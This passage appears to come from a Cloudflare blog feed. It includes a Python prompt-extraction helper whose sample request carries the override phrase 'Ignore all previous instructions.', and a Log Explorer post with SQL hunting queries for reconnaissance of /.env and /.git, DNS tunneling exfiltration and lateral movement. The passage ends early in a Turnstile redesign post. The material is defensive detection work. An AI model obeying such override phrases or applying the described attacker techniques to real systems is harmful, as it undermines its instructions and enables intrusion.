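def extract_prompts(body: dict, path: str = "$.messages[*].content") -> List[Any]:
    """Minimal JSONPath-like extraction for common chat-completions shapes.

    Supports only `$.key` and `$.key[*]` segments; anything fancier needs
    a real JSONPath implementation.
    """
    parts = path.lstrip("$.").split(".")
    current: List[Any] = [body]
    for part in parts:
        next_level: List[Any] = []
        if part.endswith("[*]"):
            # Descend into every element of a list-valued key.
            key = part[:-3]
            for obj in current:
                if isinstance(obj, dict) and isinstance(obj.get(key), list):
                    next_level.extend(obj[key])
        else:
            # Descend into a single-valued key.
            for obj in current:
                if isinstance(obj, dict) and part in obj:
                    next_level.append(obj[part])
        current = next_level
    return current

# OpenAI-style chat-completions request body (illustrative payload).
request = {
    "model": "gpt-4o",
    "messages": [
        {"role": "system", "content": "You are a helpful assistant."},
        {"role": "user", "content": "Ignore all previous instructions."},
    ],
}
print(extract_prompts(request))
# → ['You are a helpful assistant.', 'Ignore all previous instructions.']
```

The same walk handles the nested Anthropic batch shape when given `$.requests[*].params.messages[*].content`.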
    <div>
      <h3>Mitigation</h3>
      <a href="#mitigation">
        
      </a>
    </div>
    <p>Once a threat is identified and scored, you can block it, log it, or deliver custom responses, using the same WAF rules engine you already use for the rest of your application security. The power of Cloudflare’s shared platform is that you can combine AI-specific signals with everything else we know about a request, represented by <a href="https://developers.cloudflare.com/ruleset-engine/rules-language/fields/reference/"><u>hundreds of fields</u></a> available in the WAF. A prompt injection attempt is suspicious. A prompt injection attempt from an IP that’s been probing your login page, using a browser fingerprint associated with previous attacks, and rotating through a botnet is a different story. Point solutions that only see the AI layer can’t make these connections.</p><p>This unified security layer is exactly what they need at Newfold Digital to discover, label, and protect AI endpoints, says Radinger: “We look forward to using it across all these projects to serve as a fail-safe."</p>
    <div>
      <h2>Growing ecosystem</h2>
      <a href="#growing-ecosystem">
        
      </a>
    </div>
    <p>AI Security for Applications will also be available through Cloudflare's growing ecosystem, including through integration with IBM Cloud. Through <a href="https://www.ibm.com/products/cloud-internet-services"><u>IBM Cloud Internet Services (CIS)</u></a>, end users can already procure advanced application security solutions and manage them directly through their IBM Cloud account. </p><p>We're also partnering with Wiz to connect AI Security for Applications with <a href="https://www.wiz.io/solutions/ai-spm"><u>Wiz AI Security</u></a>, giving mutual customers a unified view of their AI security posture, from model and agent discovery in the cloud to application-layer guardrails at the edge.</p>
    <div>
      <h2>How to get started</h2>
      <a href="#how-to-get-started">
        
      </a>
    </div>
    <p>AI Security for Apps is available now for Cloudflare’s Enterprise customers. Contact your account team to get started, or see the product in action with a <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>self-guided tour</u></a>.</p><p>If you're on a Free, Pro, or Business plan, you can use AI endpoint discovery today. Log in to your dashboard and navigate to <b>Security → Web Assets</b> to see which endpoints we've identified. Keep an eye out — we plan to make all AI Security for Apps capabilities available for customers on all plans soon.</p><p>For configuration details, see our <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Application Security]]></category>
            <category><![CDATA[Application Services]]></category>
            <guid isPermaLink="false">4MBDCV6FV61Xbyav3cW8Xy</guid>
            <dc:creator>Liam Reese</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Catherine Newcomb</dc:creator>
        </item>
        <item>
            <title><![CDATA[Investigating multi-vector attacks in Log Explorer]]></title>
            <link>https://blog.cloudflare.com/investigating-multi-vector-attacks-in-log-explorer/</link>
            <pubDate>Tue, 10 Mar 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Log Explorer customers can now identify and investigate multi-vector attacks. Log Explorer supports 14 additional Cloudflare datasets, enabling users to have a 360-degree view of their network. ]]></description>
            <content:encoded><![CDATA[ <p>In the world of cybersecurity, a single data point is rarely the whole story. Modern attackers don’t just knock on the front door; they probe your APIs, flood your network with "noise" to distract your team, and attempt to slide through applications and servers using stolen credentials.</p><p>To stop these multi-vector attacks, you need the full picture. By using Cloudflare Log Explorer to conduct security forensics, you get 360-degree visibility through the integration of 14 new datasets, covering the full surface of Cloudflare’s Application Services and Cloudflare One product portfolios. By correlating telemetry from application-layer HTTP requests, network-layer DDoS and Firewall logs, and Zero Trust Access events, security analysts can significantly reduce Mean Time to Detect (MTTD) and effectively unmask sophisticated, multi-layered attacks.</p><p>Read on to learn more about how Log Explorer gives security teams the ultimate landscape for rapid, deep-dive forensics.</p>
    <div>
      <h2>The flight recorder for your entire stack</h2>
      <a href="#the-flight-recorder-for-your-entire-stack">
        
      </a>
    </div>
    <p>The contemporary digital landscape requires deep, correlated telemetry to defend against adversaries using multiple attack vectors. Raw logs serve as the "flight recorder" for an application, capturing every single interaction, attack attempt, and performance bottleneck. And because Cloudflare sits at the edge, between your users and your servers, all of these events are logged before the requests even reach your infrastructure. </p><p>Cloudflare Log Explorer centralizes these logs into a unified interface for rapid investigation.</p>
    <div>
      <h3>Log types supported</h3>
      <a href="#log-types-supported">
        
      </a>
    </div>
    
    <div>
      <h4>Zone-scoped logs</h4>
      <a href="#zone-scoped-logs">
        
      </a>
    </div>
    <p><i>Focus: Website traffic, security events, and edge performance.</i></p><table><tr><td><p><b>HTTP Requests</b></p></td><td><p>As the most comprehensive dataset, it serves as the "primary record" of all application-layer traffic, enabling the reconstruction of session activity, exploit attempts, and bot patterns.</p></td></tr><tr><td><p><b>Firewall Events</b></p></td><td><p>Provides critical evidence of blocked or challenged threats, allowing analysts to identify the specific WAF rules, IP reputations, or custom filters that intercepted an attack.</p></td></tr><tr><td><p><b>DNS Logs</b></p></td><td><p>Identify cache poisoning attempts, domain hijacking, and infrastructure-level reconnaissance by tracking every query resolved at the authoritative edge.</p></td></tr><tr><td><p><b>NEL (Network Error Logging) Reports</b></p></td><td><p>Distinguish between a coordinated Layer 7 DDoS attack and legitimate network connectivity issues by tracking client-side browser errors.</p></td></tr><tr><td><p><b>Spectrum Events</b></p></td><td><p>For non-web applications, these logs provide visibility into L4 traffic (TCP/UDP), helping to identify anomalies or brute-force attacks against protocols like SSH, RDP, or custom gaming traffic.</p></td></tr><tr><td><p><b>Page Shield</b></p></td><td><p>Track and audit unauthorized changes to your site's client-side environment such as JavaScript, outbound connections.</p></td></tr><tr><td><p><b>Zaraz Events</b></p></td><td><p>Examine how third-party tools and trackers are interacting with user data, which is vital for auditing privacy compliance and detecting unauthorized script behaviors.</p></td></tr></table>
    <div>
      <h4>Account-scoped logs</h4>
      <a href="#account-scoped-logs">
        
      </a>
    </div>
    <p><i>Focus: Internal security, Zero Trust, administrative changes, and network activity.</i></p><table><tr><td><p><b>Access Requests</b></p></td><td><p>Tracks identity-based authentication events to determine which users accessed specific internal applications and whether those attempts were authorized.</p></td></tr><tr><td><p><b>Audit Logs</b></p></td><td><p>Provides a trail of configuration changes within the Cloudflare dashboard to identify unauthorized administrative actions or modifications.</p></td></tr><tr><td><p><b>CASB Findings</b></p></td><td><p>Identifies security misconfigurations and data risks within SaaS applications (like Google Drive or Microsoft 365) to prevent unauthorized data exposure.</p></td></tr><tr><td><p><b>Magic Transit / IPSec Logs</b></p></td><td><p>Helps network engineers perform network-level (L3) monitoring such as reviewing tunnel health and view BGP routing changes.</p></td></tr><tr><td><p><b>Browser Isolation Logs</b></p></td><td><p>Tracks user actions <i>inside</i> an isolated browser session (e.g., copy-paste, print, or file uploads) to prevent data leaks on untrusted sites </p></td></tr><tr><td><p><b>Device Posture Results </b></p></td><td><p>Details the security health and compliance status of devices connecting to your network, helping to identify compromised or non-compliant endpoints.</p></td></tr><tr><td><p><b>DEX Application Tests </b></p></td><td><p>Monitors application performance from the user's perspective, which can help distinguish between a security-related outage and a standard performance degradation.</p></td></tr><tr><td><p><b>DEX Device State Events</b></p></td><td><p>Provides telemetry on the physical state of user devices, useful for correlating hardware or OS-level anomalies with potential security incidents.</p></td></tr><tr><td><p><b>DNS Firewall Logs</b></p></td><td><p>Tracks DNS queries filtered through the DNS Firewall to identify communication with known malicious domains or command-and-control 
(C2) servers.</p></td></tr><tr><td><p><b>Email Security Alerts</b></p></td><td><p>Logs malicious email activity and phishing attempts detected at the gateway to trace the origin of email-based entry vectors.</p></td></tr><tr><td><p><b>Gateway DNS</b></p></td><td><p>Monitors every DNS query made by users on your network to identify shadow IT, malware callbacks, or domain-generation algorithms (DGAs).</p></td></tr><tr><td><p><b>Gateway HTTP</b></p></td><td><p>Provides full visibility into encrypted and unencrypted web traffic to detect hidden payloads, malicious file downloads, or unauthorized SaaS usage.</p></td></tr><tr><td><p><b>Gateway Network</b></p></td><td><p>Tracks L3/L4 network traffic (non-HTTP) to identify unauthorized port usage, protocol anomalies, or lateral movement within the network.</p></td></tr><tr><td><p><b>IPSec Logs</b></p></td><td><p>Monitors the status and traffic of encrypted site-to-site tunnels to ensure the integrity and availability of secure network connections.</p></td></tr><tr><td><p><b>Magic IDS Detections</b></p></td><td><p>Surfaces matches against intrusion detection signatures to alert investigators to known exploit patterns or malware behavior traversing the network.</p></td></tr><tr><td><p><b>Network Analytics Logs</b></p></td><td><p>Provides high-level visibility into packet-level data to identify volumetric DDoS attacks or unusual traffic spikes targeting specific infrastructure.</p></td></tr><tr><td><p><b>Sinkhole HTTP Logs</b></p></td><td><p>Captures traffic directed to "sinkholed" IP addresses to confirm which internal devices are attempting to communicate with known botnet infrastructure.</p></td></tr><tr><td><p><b>WARP Config Changes</b></p></td><td><p>Tracks modifications to the WARP client settings on end-user devices to ensure that security agents haven't been tampered with or disabled.</p></td></tr><tr><td><p><b>WARP Toggle Changes</b></p></td><td><p>Specifically logs when users enable or disable their secure 
connectivity, helping to identify periods where a device may have been unprotected.</p></td></tr><tr><td><p><b>Zero Trust Network Session Logs</b></p></td><td><p>Logs the duration and status of authenticated user sessions to map out the complete lifecycle of a user's access within the protected perimeter.</p></td></tr></table>
    <div>
      <h2>Log Explorer can identify malicious activity at every stage</h2>
      <a href="#log-explorer-can-identify-malicious-activity-at-every-stage">
        
      </a>
    </div>
    <p>Get granular application-layer visibility with <b>HTTP Requests</b>, <b>Firewall Events</b>, and <b>DNS logs</b> to see exactly how traffic is hitting your public-facing properties. Track internal movement with <b>Access Requests</b>, <b>Gateway logs</b>, and <b>Audit logs</b>: if a credential is compromised, you’ll see where the attacker went. Use <b>Magic IDS</b> and <b>Network Analytics logs</b> to spot volumetric attacks and "East-West" lateral movement within your private network.</p>
    <div>
      <h3>Identify the reconnaissance</h3>
      <a href="#identify-the-reconnaissance">
        
      </a>
    </div>
    <p>Attackers use scanners and other tools to look for entry points, hidden directories, or software vulnerabilities. To identify this activity in Log Explorer, query <code>http_requests</code> for <code>EdgeResponseStatus</code> codes of 401, 403, or 404 coming from a single IP, or for requests to sensitive paths (e.g. <code>/.env</code>, <code>/.git</code>, <code>/wp-admin</code>). </p><p>The <code>magic_ids_detections</code> logs can also be used to identify scanning at the network layer. These logs provide packet-level visibility into threats targeting your network. Unlike standard HTTP logs, they focus on <b>signature-based detections</b> at the network and transport layers (IP, TCP, UDP). Query for cases where a single <code>SourceIP</code> triggers multiple unique detections across a wide range of <code>DestinationPort</code> values in a short timeframe. Magic IDS signatures can specifically flag activities like Nmap scans or SYN stealth scans.</p>
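In the style of the Log Explorer queries later in this post, a sketch of that reconnaissance hunt (the date, IP, and field list are placeholders to adapt; confirm field names against the dataset reference):

```sql
SELECT ClientIP, ClientRequestPath, EdgeResponseStatus
FROM http_requests
WHERE date = '2026-02-22'
  AND (EdgeResponseStatus = 401 OR EdgeResponseStatus = 403 OR EdgeResponseStatus = 404)
  AND ClientIP = 'INSERT_SUSPICIOUS_IP_HERE'
LIMIT 100
```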
    <div>
      <h3>Check for diversions</h3>
      <a href="#check-for-diversions">
        
      </a>
    </div>
    <p>While the attacker is conducting reconnaissance, they may attempt to disguise this with a simultaneous network flood. Pivot to <code>network_analytics_logs</code> to see if a volumetric attack is being used as a smokescreen.</p>
    <div>
      <h3>Identify the approach </h3>
      <a href="#identify-the-approach">
        
      </a>
    </div>
    <p>Once attackers identify a potential vulnerability, they begin to craft their weapon. The attacker sends malicious payloads (e.g. SQL injection or large/corrupt file uploads) to confirm the vulnerability. Review <code>http_requests</code> and/or <code>fw_events</code> to see which Cloudflare detections were triggered. Cloudflare logs security signals in these datasets, so you can easily identify requests with malicious payloads using fields such as <code>WAFAttackScore</code>, <code>WAFSQLiAttackScore</code>, <code>FraudAttack</code>, <code>ContentScanJobResults</code>, and several more. Review <a href="https://developers.cloudflare.com/logs/logpush/logpush-job/datasets/zone/http_requests/"><u>our documentation</u></a> for a full description of these fields. The <code>fw_events</code> logs can be used to determine whether these requests made it past Cloudflare’s defenses by examining the <code>action</code>, <code>source</code>, and <code>ruleID</code> fields. Cloudflare’s managed rules block many of these payloads by default. Review the Application Security Overview to confirm your application is protected.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1zpFguYrnbOPwyASGQCqZK/63f398acce2226e453a5eea1cc749241/image3.png" />
          </figure><p><sup><i>The Managed Rules insight displayed on the Security Overview page when the current zone does not have Managed Rules enabled</i></sup></p>
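As a sketch in the same query style, a low WAF attack score flags likely-malicious payloads (Cloudflare documents lower scores as higher attack confidence; the threshold and date here are illustrative):

```sql
SELECT ClientIP, ClientRequestPath, WAFAttackScore, WAFSQLiAttackScore
FROM http_requests
WHERE date = '2026-02-22'
  AND WAFAttackScore < 20
LIMIT 100
```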
    <div>
      <h3>Audit the identity</h3>
      <a href="#audit-the-identity">
        
      </a>
    </div>
    <p>Did that suspicious IP manage to log in? Use the <code>ClientIP</code> to search <code>access_requests</code>. If you see a "<code>Decision: Allow</code>" for a sensitive internal app, you know you have a compromised account.</p>
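That pivot can be sketched with the same <code>access_requests</code> fields used later in this post (the IP is a placeholder):

```sql
SELECT Email, IPAddress, Allowed
FROM access_requests
WHERE date = '2026-02-22'
  AND IPAddress = 'INSERT_SUSPICIOUS_IP_HERE'
  AND Allowed = true
```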
    <div>
      <h3>Stop the leak (data exfiltration)</h3>
      <a href="#stop-the-leak-data-exfiltration">
        
      </a>
    </div>
    <p>Attackers sometimes use DNS tunneling to bypass firewalls by encoding sensitive data (like passwords or SSH keys) into DNS queries. Instead of a normal request like <code>google.com</code>, the logs will show long, encoded strings. Look for an unusually high volume of queries for unique, long, and high-entropy subdomains by examining these fields: in <code>QueryName</code>, look for strings like <code>h3ldo293js92.example.com</code>; in <code>QueryType</code>, tunneling often uses <code>TXT</code>, <code>CNAME</code>, or <code>NULL</code> records to carry the payload; and use <code>ClientIP</code> to identify whether a single internal host is generating thousands of these unique requests.</p><p>Additionally, attackers may attempt to leak sensitive data by hiding it within non-standard protocols or by using common protocols (like DNS or ICMP) in unusual ways to bypass standard firewalls. Discover this by querying the <code>magic_ids_detections</code> logs for signatures that flag protocol anomalies, such as "ICMP tunneling" or "DNS tunneling" detections in the <code>SignatureMessage</code> field.</p><p>Whether you are investigating a zero-day vulnerability or tracking a sophisticated botnet, the data you need is now at your fingertips.</p>
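A sketch of the tunneling hunt described above. Treat the dataset name (<code>dns_logs</code>) and the string form of <code>QueryType</code> as assumptions to verify against the dataset reference, since some datasets record the numeric record type instead:

```sql
SELECT ClientIP, QueryName, QueryType
FROM dns_logs
WHERE date = '2026-02-22'
  AND QueryType = 'TXT'
  AND ClientIP = 'INSERT_INTERNAL_HOST_IP_HERE'
LIMIT 100
```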
    <div>
      <h2>Correlate across datasets</h2>
      <a href="#correlate-across-datasets">
        
      </a>
    </div>
    <p>Investigate malicious activity across multiple datasets by pivoting between concurrent searches. With the new Tabs feature, Log Explorer lets you work with multiple queries simultaneously: switch between tabs to query different datasets, or pivot and refine queries by filtering on your query results.</p><div>
  
</div>
<p>When you correlate data across multiple Cloudflare log sources, you can detect sophisticated multi-stage attacks that appear benign when viewed in isolation. This cross-dataset analysis allows you to see the full attack chain from reconnaissance to exfiltration.</p>
    <div>
      <h3>Session hijacking (token theft)</h3>
      <a href="#session-hijacking-token-theft">
        
      </a>
    </div>
    <p><b>Scenario:</b> A user authenticates via Cloudflare Access, but their subsequent HTTP request traffic looks like a bot.</p><p><b>Step 1:</b> Identify high-risk sessions in <code>http_requests</code>.</p>
            <pre><code>SELECT RayID, ClientIP, ClientRequestUserAgent, BotScore
FROM http_requests
WHERE date = '2026-02-22' 
  AND BotScore &lt; 20 
LIMIT 100</code></pre>
            <p><b>Step 2:</b> Copy the <code>RayID</code> and search <code>access_requests</code> to see which user account is associated with that suspicious bot activity.</p>
            <pre><code>SELECT Email, IPAddress, Allowed
FROM access_requests
WHERE date = '2026-02-22' 
  AND RayID = 'INSERT_RAY_ID_HERE'</code></pre>
            
    <div>
      <h3>Post-phishing C2 beaconing</h3>
      <a href="#post-phishing-c2-beaconing">
        
      </a>
    </div>
    <p><b>Scenario:</b> An employee clicked a link in a phishing email, compromising their workstation. The workstation sends a DNS query for a known malicious domain, then immediately triggers an IDS alert.</p><p><b>Step 1:</b> Find phishing attacks by examining <code>email_security_alerts</code> for violations.</p>
            <pre><code>SELECT Timestamp, Threatcategories, To, Alertreason
FROM email_security_alerts
WHERE date = '2026-02-22' 
  AND Threatcategories LIKE '%phishing%'</code></pre>
            <p><b>Step 2:</b> Use Access logs to correlate the user’s email (the <code>To</code> field) with their IP address.</p>
            <pre><code>SELECT Email, IPAddress
FROM access_requests
WHERE date = '2026-02-22' 
  AND Email = 'INSERT_EMAIL_FROM_STEP_1'</code></pre>
            <p><b>Step 3:</b> Find internal IPs querying a specific malicious domain in <code>gateway_dns</code> logs.</p>
            <pre><code>SELECT SrcIP, QueryName, DstIP
FROM gateway_dns
WHERE date = '2026-02-22' 
  AND SrcIP = 'INSERT_IP_FROM_PREVIOUS_QUERY'
  AND QueryName LIKE '%malicious_domain_name%'</code></pre>
            
    <div>
      <h3>Lateral movement (Access → network probing)</h3>
      <a href="#lateral-movement-access-network-probing">
        
      </a>
    </div>
    <p><b>Scenario:</b> A user logs in via Zero Trust and then tries to scan the internal network.</p><p><b>Step 1:</b> Find successful logins from unexpected locations in <code>access_requests</code>.</p>
            <pre><code>SELECT IPAddress, Email, Country
FROM access_requests
WHERE date = '2026-02-22' 
  AND Allowed = true 
  AND Country != 'US' -- Replace with your HQ country</code></pre>
            <p><b>Step 2:</b> Check if that <code>IPAddress</code> is triggering network-level signatures in <code>magic_ids_detections</code>.</p>
            <pre><code>SELECT SignatureMessage, DestinationIP, Protocol
FROM magic_ids_detections
WHERE date = '2026-02-22' 
  AND SourceIP = 'INSERT_IP_ADDRESS_HERE'</code></pre>
            
    <div>
      <h3>Opening doors for more data </h3>
      <a href="#opening-doors-for-more-data">
        
      </a>
    </div>
    <p>From the beginning, Log Explorer was designed with extensibility in mind. Every dataset schema is defined using JSON Schema, a widely-adopted standard for describing the structure and types of JSON data. This design decision has enabled us to easily expand beyond HTTP Requests and Firewall Events to the full breadth of Cloudflare's telemetry. The same schema-driven approach that powered our initial datasets scaled naturally to accommodate Zero Trust logs, network analytics, email security alerts, and everything in between.</p><p>More importantly, this standardization opens the door to ingesting data beyond Cloudflare's native telemetry. Because our ingestion pipeline is schema-driven rather than hard-coded, we're positioned to accept any structured data that can be expressed in JSON format. For security teams managing hybrid environments, this means Log Explorer could eventually serve as a single pane of glass, correlating Cloudflare's edge telemetry with logs from third-party sources, all queryable through the same SQL interface. While today's release focuses on completing coverage of Cloudflare's product portfolio, the architectural groundwork is laid for a future where customers can bring their own data sources with custom schemas.</p>
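To make this concrete, a hypothetical dataset schema (illustrative only, not an actual Log Explorer schema) expressed in JSON Schema might look like:

```json
{
  "$schema": "https://json-schema.org/draft/2020-12/schema",
  "title": "example_dataset",
  "type": "object",
  "properties": {
    "Timestamp": { "type": "string", "format": "date-time" },
    "ClientIP": { "type": "string" },
    "EdgeResponseStatus": { "type": "integer" }
  },
  "required": ["Timestamp"]
}
```

Because the ingestion pipeline reads structure and types from schemas like this rather than from hard-coded definitions, supporting a new dataset amounts to registering a new schema.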
    <div>
      <h3>Faster data, faster response: architectural upgrades</h3>
      <a href="#faster-data-faster-response-architectural-upgrades">
        
      </a>
    </div>
    <p>To investigate a multi-vector attack effectively, timing is everything. A delay of even a few minutes in log availability can be the difference between proactive defense and reactive damage control.</p><p>That is why we have optimized our ingestion for better speed and resilience. By increasing concurrency in one part of our ingestion path, we have eliminated bottlenecks that could cause “noisy neighbor” issues, ensuring that one client’s data surge doesn’t slow down another’s visibility. This architectural work has reduced our P99 ingestion latency by approximately 55%, and our P50 by 25%, cutting the time it takes for an event at the edge to become available for your SQL queries.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/41M2eWP0BwrQFSZW4GzZbV/7a6139354abb561aba17e77d83beb17a/image4.png" />
          </figure><p><sup><i>Grafana chart displaying the drop in ingest latency after architectural upgrades</i></sup></p>
    <div>
      <h2>Follow along for more updates</h2>
      <a href="#follow-along-for-more-updates">
        
      </a>
    </div>
    <p>We're just getting started. We're actively working on even more powerful features to further enhance your experience with Log Explorer, including the ability to run these detection queries on a custom-defined schedule.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2JIOu9PXDwVAVcmbgq456q/1eace4b5d38bb705e82442a4ee8045dc/Scheduled_Queries_List.png" />
          </figure><p><sup><i>Design mockup of upcoming Log Explorer Scheduled Queries feature</i></sup></p><p><a href="https://blog.cloudflare.com/"><u>Subscribe to the blog</u></a> and keep an eye out for more Log Explorer updates soon in our <a href="https://developers.cloudflare.com/changelog/product/log-explorer/"><u>Change Log</u></a>. </p>
    <div>
      <h2>Get access to Log Explorer</h2>
      <a href="#get-access-to-log-explorer">
        
      </a>
    </div>
    <p>To get access to Log Explorer, you can purchase it self-serve directly from the dashboard. Contract customers can reach out for a <a href="https://www.cloudflare.com/application-services/products/log-explorer/"><u>consultation</u></a> or contact their account manager. You can also read more in our <a href="https://developers.cloudflare.com/logs/log-explorer/"><u>Developer Documentation</u></a>.</p>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Logs]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Storage]]></category>
            <category><![CDATA[SIEM]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <guid isPermaLink="false">1hirraqs3droftHovXp1G6</guid>
            <dc:creator>Jen Sells</dc:creator>
            <dc:creator>Claudio Jolowicz</dc:creator>
            <dc:creator>Nico Gutierrez</dc:creator>
        </item>
        <item>
            <title><![CDATA[The most-seen UI on the Internet? Redesigning Turnstile and Challenge Pages]]></title>
            <link>https://blog.cloudflare.com/the-most-seen-ui-on-the-internet-redesigning-turnstile-and-challenge-pages/</link>
            <pubDate>Fri, 27 Feb 2026 06:00:00 GMT</pubDate>
            <description><![CDATA[ We serve 7.6 billion challenges daily. Here’s how we used research, AAA accessibility standards, and a unified architecture to redesign the Internet’s most-seen user interface. ]]></description>
            <content:encoded><![CDATA[ <p>You've seen it. Maybe you didn't register it consciously, but you've seen it. That little widget asking you to verify you're human. That full-page security check before accessing a website. If you've spent any time on the Internet, you've encountered Cloudflare's Turnstile widget or Challenge Pages — likely more times than you can count.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5YaxxmA9nz7AufmcJmhagL/0db6b65ec7456bc8091affc6beaf3ec2/Image_1_-_Turnstile.png" />
          </figure><p><sup><i>The Turnstile widget – a familiar sight across millions of websites</i></sup></p><p>When we say that a large portion of the Internet sits behind Cloudflare, we mean it. Our Turnstile widget and Challenge Pages are served 7.67 billion times every single day. That's not a typo. Billions. This might just be the most-seen user interface on the Internet.</p><p>And that comes with enormous responsibility.</p><p>Designing a product with billions of eyeballs on it isn't just challenging — it requires a fundamentally different approach. Every pixel, every word, every interaction has to work for someone's grandmother in rural Japan, a teenager in São Paulo, a visually impaired developer in Berlin, and a busy executive in Lagos. All at the same time. In moments of frustration.</p><p>Today we’re sharing the story of how we redesigned Turnstile and Challenge Pages. It's a story told in three parts, by three of us: the design process and research that shaped our decisions (Leo), the engineering challenge of deploying changes at unprecedented scale (Ana), and the measurable impact on billions of users (Marina).</p><p>Let's start with how we approached the problem from a design perspective.</p>
    <div>
      <h2>Part 1: The design process</h2>
      <a href="#part-1-the-design-process">
        
      </a>
    </div>
    
    <div>
      <h3>The problem</h3>
      <a href="#the-problem">
        
      </a>
    </div>
    <p>Let's be honest: nobody likes being asked to prove they're human. You know you're human. I know I'm human. The only one who doesn't seem convinced is that little widget standing between you and the website you're trying to access. At best, it's a minor inconvenience. At worst? You've probably wanted to throw your computer out the window in a fit of rage. We've all been there. And no one would blame you.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/640zjNaqDcNdJy4mYN6H14/ce184df68c9612d77f0767726bf27822/2.png" />
</figure><p><sup><i>Turnstile integrated into a login flow</i></sup></p><p>As the world warms up to what appears to be an inevitable AI revolution, the need for security verification is only increasing. At Cloudflare, we've seen a significant rise in bot attacks — and in response, organizations are investing more heavily in security measures. That means more challenges being issued to more end users, more often.</p><p>The numbers tell the story:</p><ul><li><p>2023: 2.14B daily</p></li><li><p>2024: 3B daily</p></li><li><p>2025: 5.35B daily</p></li></ul><p>That's a 58.1% average increase in security checks, year over year. More security checks mean more opportunities for end user frustration. The more companies integrate these verification systems to protect themselves and their customers, the higher the chance that someone, somewhere, is going to have a bad experience.</p><p>We knew it was time to take a hard look at our flagship products and ask ourselves: Are we doing right by the billions of people who encounter these experiences? Are we fulfilling our mission to build a better Internet — not just a more secure one, but a more human one?</p><p>The answer, we discovered, was: we could do better.</p>
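<p>For the curious, the 58.1% figure is the compound annual growth rate implied by the 2023 and 2025 daily volumes. A quick sketch of the arithmetic (TypeScript, purely illustrative):</p>

```typescript
// Compound annual growth rate (CAGR) from the daily challenge volumes above.
const daily2023 = 2.14e9;
const daily2025 = 5.35e9;
const years = 2;

// CAGR = (end / start)^(1 / years) - 1
const cagr = Math.pow(daily2025 / daily2023, 1 / years) - 1;

console.log(`${(cagr * 100).toFixed(1)}% average increase, year over year`);
// 58.1% average increase, year over year
```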
    <div>
      <h3>The design audit</h3>
      <a href="#the-design-audit">
        
      </a>
    </div>
    <p>Before redesigning anything, we needed to understand what we were working with. We started by conducting a comprehensive audit of every state, every error message, and every interaction across both Turnstile and Challenge Pages.</p><p>What we found wasn't the best.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1g1exDgeRH9QlApBXItcfL/fb0051d1dabaa6c91cf976ef64793502/3.png" />
          </figure><p><sup><i>The state of inconsistency in the Turnstile widget. Multiple states with no unified approach</i></sup></p><p>The inconsistencies were glaring. We had no unified approach across the multitude of different error scenarios. Some messages were overly verbose and technical ("Your device clock is set to a wrong time or this challenge page was accidentally cached by an intermediary and is no longer available"). Others were too vague to be helpful ("Timed out"). The visual language varied wildly — different layouts, different hierarchies, different tones of voice.</p><p>We also examined the feedback we'd received online. Social media, support tickets, community forums — we read it all. The frustration was palpable, and much of it was avoidable.</p><p>Take our feedback mechanism, for example. We offered users feedback options like "The widget sometimes fails" versus "The widget fails all the time." But what's the difference, really? And how were they supposed to know how often it failed? We were asking users to interpret ambiguous options during their most frustrated moments. The more we left open to interpretation, the less useful the feedback became — and the more frustration we saw across social channels.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xKRSM0FfDZikEECwgHoof/ad55208973698cb237444c21d384aff8/4.png" />
          </figure><p><sup><i>The previous feedback screen: "The widget sometimes fails" vs "The widget fails all the time" — what's the difference?</i></sup></p><p>Our Challenge Pages — the full-page security blocks that appear when we detect suspicious activity or when site owners have heightened security settings — had similar issues. Some states were confusing. Others used too much technical jargon. Many failed to provide actionable guidance when users needed it most.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5JUxHjJ4VG13F7QfLONJEQ/fa443e5dd24f10d0c256864cd3f42734/5.png" />
          </figure><p><sup><i>The state of inconsistency on the Challenge pages. Multiple states with no unified approach</i></sup></p><p>The audit was humbling. But it gave us a clear picture of where we needed to focus.</p>
    <div>
      <h2>Mapping the user journey</h2>
      <a href="#mapping-the-user-journey">
        
      </a>
    </div>
    <p>To design better experiences, we first needed to understand every possible path a user could take. What was the happy path? Was there even one? And what were the unhappy paths that led to escalating frustration?</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1oTbFZoRu7guIxzoe64qcm/4f579fe2e70d6225a51504b3de10030f/6.png" />
</figure><p><sup><i>Mapping the complete user journey — from initial encounter through error scenarios, with sentiment tracking</i></sup></p><p>This was a true cross-functional effort. We worked closely with engineers like Ana who knew the technical ins and outs of every edge case, and with Marina on the product side who understood not just how the product worked, but how users felt about it — the love and the hate we'd see online.</p><p>We have some of the smartest people working on bot protection at Cloudflare. But intelligence and clarity aren't the same thing. There's a delicate balance between technical complexity and user simplicity. Only when these two dance together successfully can we communicate information in a way that actually makes sense to people.</p><p>And here's the thing: the messaging has to work for everyone. A person of any age. Any mental or physical capability. Any cultural background. Any level of technical sophistication. That's what designing at scale really means — you can’t ignore edge cases, because at this scale they are no longer edge cases.</p>
    <div>
      <h2>Establishing a unified information architecture</h2>
      <a href="#establishing-a-unified-information-architecture">
        
      </a>
    </div>
